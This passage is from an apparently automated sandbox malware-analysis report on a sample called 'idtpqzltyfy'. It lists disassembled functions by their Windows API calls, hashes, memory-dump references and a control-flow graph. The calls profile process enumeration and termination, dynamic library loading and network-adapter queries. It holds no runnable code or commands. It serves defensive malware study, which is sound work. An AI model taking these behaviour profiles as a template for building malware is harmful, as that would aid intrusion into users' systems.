                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3236713533-0
                                                                                                                                                                                                            • Opcode ID: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
                                                                                                                                                                                                            • Instruction ID: 7cea0b3704c3af19e84f17581c6bd26a002671af38bbf90a46284e20a9b8cb3f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c790db70c0ad818271181fe7d940470d40b1c58603dba8fb8f25ca032381e17d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24712031A01304EFC701DFA9FC85A757BB4FB88710B61465AE44592EB4E77489E4CF81
                                                                                                                                                                                                            Function 0014BD08 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014BDDD
                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,000000FF), ref: 0014BE24
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014BE68
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014BF01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0014BF2F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 39eac9d5adceefb8c15550e11d1bcf67db098d1d40c4cd8446dce11c0c6a71ee
                                                                                                                                                                                                            • Instruction ID: ccb021a07620769e6defeb3c3bf0685f2b768490c4ec524bc0fb80500a692929
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39eac9d5adceefb8c15550e11d1bcf67db098d1d40c4cd8446dce11c0c6a71ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD51FE75A01315DFC708DF24FCD5AAA3BF5FB98329B05825AE50597AB0EB348AD0CB40
                                                                                                                                                                                                            Function 00175440 Relevance: 7.6, APIs: 5, Instructions: 71synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0015E92E,0015CA40,00000000,?), ref: 001754B2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 001754E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,0015E92E,0015CA40,00000000,?), ref: 0017551D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 00175538
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,0015E92E,0015CA40,00000000,?), ref: 0017554B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1404307249-0
                                                                                                                                                                                                            • Opcode ID: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
                                                                                                                                                                                                            • Instruction ID: 694a498d2173d1225c7d47ecbbef0716c760df5f3367694ff5c9aa56facf8e8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74c2ad7216397147a5393ea55bd6ad1447b18c4dd5cf088603c679d8f1950da1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED318931601305EBD3289F64FC89B227BB6FB48711F50821AE5469BEB0E77086D0CB91
                                                                                                                                                                                                            Function 0016FA80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,0015ED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 0016FBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(0015ED48,?,?,?,?,?,00000000), ref: 0016FC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0016FC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
                                                                                                                                                                                                            • Instruction ID: b5e36886409db179b7c7625acc9b4959b6bec182829420ef1e314270b64b7669
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA51EA31950218DBD704DF64FC86BB63BF8FB48B11F40021AE04696EB4EBB496E4CB95
                                                                                                                                                                                                            Function 0014D000 Relevance: 6.3, APIs: 4, Instructions: 269fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0014D11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 0014D1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0014D3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0014D2E9
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(0014D410,?,0014D410,00000108), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateMutexReadRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1760212717-0
                                                                                                                                                                                                            • Opcode ID: 72af997ed25fe048fd48a17c9fea360f5ddf1f87d2654848f55dde944fd5d7c8
                                                                                                                                                                                                            • Instruction ID: b53dfed79cce73865776e9820254b5fbdbd8f5860e03451f709f7cc4fa9efc8e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72af997ed25fe048fd48a17c9fea360f5ddf1f87d2654848f55dde944fd5d7c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54B16A71A00600DBCB04AF64FC85B693BB5FBD8711F218156E54597EF1EB709AE4CB82
                                                                                                                                                                                                            Function 00152120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00152257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00152384
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00152426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                            • Opcode ID: d09377855a9eda7c2e7454410b60b6d780d694d168c48a09e5e4403fa5e214ce
                                                                                                                                                                                                            • Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d09377855a9eda7c2e7454410b60b6d780d694d168c48a09e5e4403fa5e214ce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51
                                                                                                                                                                                                            Function 001568D0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,001503A9,00000000,?), ref: 00156957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,001503A9,00000000), ref: 0015695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,001503A9,00000000,?), ref: 001569C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,001503A9,00000000,?), ref: 001569CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction ID: 5fe13a9a5083639da10640ce7b551ac2f636f8185c7407b44799b024cbd98ca6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0854f8f39c79355000b5cca1c97547dff543017d721ebea2f690d2947a5c11b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED21AEB2605204DFD7049F61FE8A9503F78F785310B624619E98693DB4E73199E1CF90
                                                                                                                                                                                                            Function 00160FD8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: b4656a4c5f8482031727f7f7eaad5f1f04ca7793e41cb5cc8ead07e1821537b5
                                                                                                                                                                                                            • Instruction ID: ef8cb2bfebd598330e323af41355f5a4dbc948586ff720e8fd952b287562e22a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4656a4c5f8482031727f7f7eaad5f1f04ca7793e41cb5cc8ead07e1821537b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11F11371A00215DFD714EF60FC92ABA3BB9FB64300F54826AE40A579B1EB708AD4CF50
                                                                                                                                                                                                            Function 001750E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(0016247D,00000001,?,?,0016247D), ref: 0017518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 001752BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.1324986509.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.1324959249.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325019042.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.000000000017E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.0000000000188000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325033920.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.1325150649.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
                                                                                                                                                                                                            • Instruction ID: 82845a754f6ede21e7eb08de9a3fb57ff9c2689891cd13d6accb8e7c52fc6a73
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 078d7c74786d9cd1011380062dce38b52bf8972c8095f24bab9c3b901f651bbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0451DE72A00A11CFC308DF69FD899253BB6F7987003464116E48AC7EB4EB748AE4CB85

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00160D80 Relevance: 25.7, APIs: 11, Strings: 3, Instructions: 1222COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/$U][v
                                                                                                                                                                                                            • API String ID: 0-1996962770
                                                                                                                                                                                                            • Opcode ID: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
                                                                                                                                                                                                            • Instruction ID: 90313c74ff47ac2c4b629f26429c197e08e3fbfd281e0d3b7a6a192a629c6b15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a457eeb441ef02acbbd4f9f617d531920dcb212b0b411580e480863b52f9d365
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4B25671A00204DFD709EF64FC95AB93BB5FBA4300B55425AE44697EB4EB308AE5CF81
                                                                                                                                                                                                            Function 0015A930 Relevance: 25.3, APIs: 13, Strings: 1, Instructions: 829memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 999 15a930-15a996 1000 15a9b4-15aae9 call 142f90 call 1413e0 call 151bb0 GetProcessHeap 999->1000 1001 15a998-15a9ad 999->1001 1008 15ab54-15abaf call 142f90 LoadLibraryA 1000->1008 1009 15aaeb-15aafd 1000->1009 1001->1000 1016 15abb1-15abbd 1008->1016 1017 15abc3-15abf4 call 151bb0 1008->1017 1010 15ab12-15ab2c 1009->1010 1011 15aaff-15ab11 1009->1011 1013 15ab41-15ab53 1010->1013 1014 15ab2e-15ab40 1010->1014 1016->1017 1020 15abf6-15ac0d 1017->1020 1021 15ac53-15ac6d 1017->1021 1024 15ac0f-15ac2a 1020->1024 1025 15ac2b-15ac3b 1020->1025 1022 15ac83 1021->1022 1023 15ac6f-15ac81 1021->1023 1028 15ac8d-15acee call 142f90 GetProcAddress call 151bb0 1022->1028 1023->1028 1026 15ac3d-15ac44 1025->1026 1027 15ac4a-15ac52 1025->1027 1026->1027 1033 15acf0-15ad27 FreeLibrary 1028->1033 1034 15ad28-15ad76 HeapAlloc 1028->1034 1035 15ad8c-15ad9a 1034->1035 1036 15ad78-15ad8a 1034->1036 1037 15ada0-15ada2 1035->1037 1036->1037 1038 15ada4-15adc8 1037->1038 1039 15adfa-15ae2a GetAdaptersInfo 1037->1039 1040 15add4-15adf9 FreeLibrary 1038->1040 1041 15adca 1038->1041 1042 15ae30-15ae75 HeapFree 1039->1042 1043 15af4b 1039->1043 1041->1040 1044 15ae77-15ae84 1042->1044 1045 15ae8a-15aea8 HeapAlloc 1042->1045 1046 15af50-15af6e 1043->1046 1044->1045 1047 15af24-15af49 1045->1047 1048 15aeaa-15aedd FreeLibrary 1045->1048 1049 15af70-15af7d 1046->1049 1050 15af83-15af9e GetAdaptersInfo 1046->1050 1047->1046 1051 15af11-15af23 1048->1051 1052 15aedf-15af10 1048->1052 1049->1050 1053 15afa4-15afe6 1050->1053 1054 15b6a3 1050->1054 1056 15aff2-15b060 call 142f90 call 1413e0 1053->1056 1057 15afe8 1053->1057 1055 15b6ad-15b71d HeapFree FreeLibrary 1054->1055 1062 15b062 1056->1062 1063 15b06c-15b0ad call 151bb0 1056->1063 1057->1056 1062->1063 1066 15b0b3-15b0e0 call 16b260 1063->1066 1069 15b1e5-15b21d 1066->1069 1070 15b0e6-15b125 call 16b260 1066->1070 1071 15b223-15b225 1069->1071 1076 15b127-15b141 1070->1076 1077 15b143-15b157 1070->1077 1071->1066 1073 15b22b-15b22e 1071->1073 1075 15b659-15b6a1 call 16a7e0 1073->1075 1075->1055 1079 15b15d-15b15f 1076->1079 1077->1079 1081 15b161-15b1b2 1079->1081 1082 15b1d3-15b1df 1079->1082 1083 15b1b4 1081->1083 1084 15b1be-15b1c5 1081->1084 1082->1069 1083->1084 1085 15b1c7-15b1d1 1084->1085 1086 15b233-15b274 call 142f90 1084->1086 1085->1071 1089 15b276-15b294 1086->1089 1090 15b29a-15b2d1 call 1413e0 call 151bb0 1086->1090 1089->1090 1095 15b2d3-15b2dd 1090->1095 1096 15b2df-15b2fe 1090->1096 1097 15b30a-15b31e 1095->1097 1096->1097 1098 15b300 1096->1098 1099 15b395 1097->1099 1100 15b320-15b360 1097->1100 1098->1097 1103 15b397-15b39e 1099->1103 1101 15b362-15b376 1100->1101 1102 15b378-15b393 1100->1102 1101->1103 1102->1103 1104 15b3a4-15b402 1103->1104 1105 15b5d1-15b656 call 16a7e0 1103->1105 1106 15b404-15b41c 1104->1106 1107 15b43d-15b4b0 1104->1107 1105->1075 1106->1107 1111 15b41e-15b437 1106->1111 1109 15b4b2-15b4bc 1107->1109 1110 15b4be-15b4ea 1107->1110 1113 15b50a-15b510 1109->1113 1110->1113 1114 15b4ec-15b504 1110->1114 1111->1107 1115 15b517-15b530 1113->1115 1116 15b512-15b516 1113->1116 1114->1113 1117 15b532-15b541 1115->1117 1118 15b579-15b592 1115->1118 1116->1115 1119 15b561-15b577 1117->1119 1120 15b543-15b55f 1117->1120 1121 15b598-15b5c8 1118->1121 1119->1121 1120->1121 1121->1104 1122 15b5ce 1121->1122 1122->1105
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
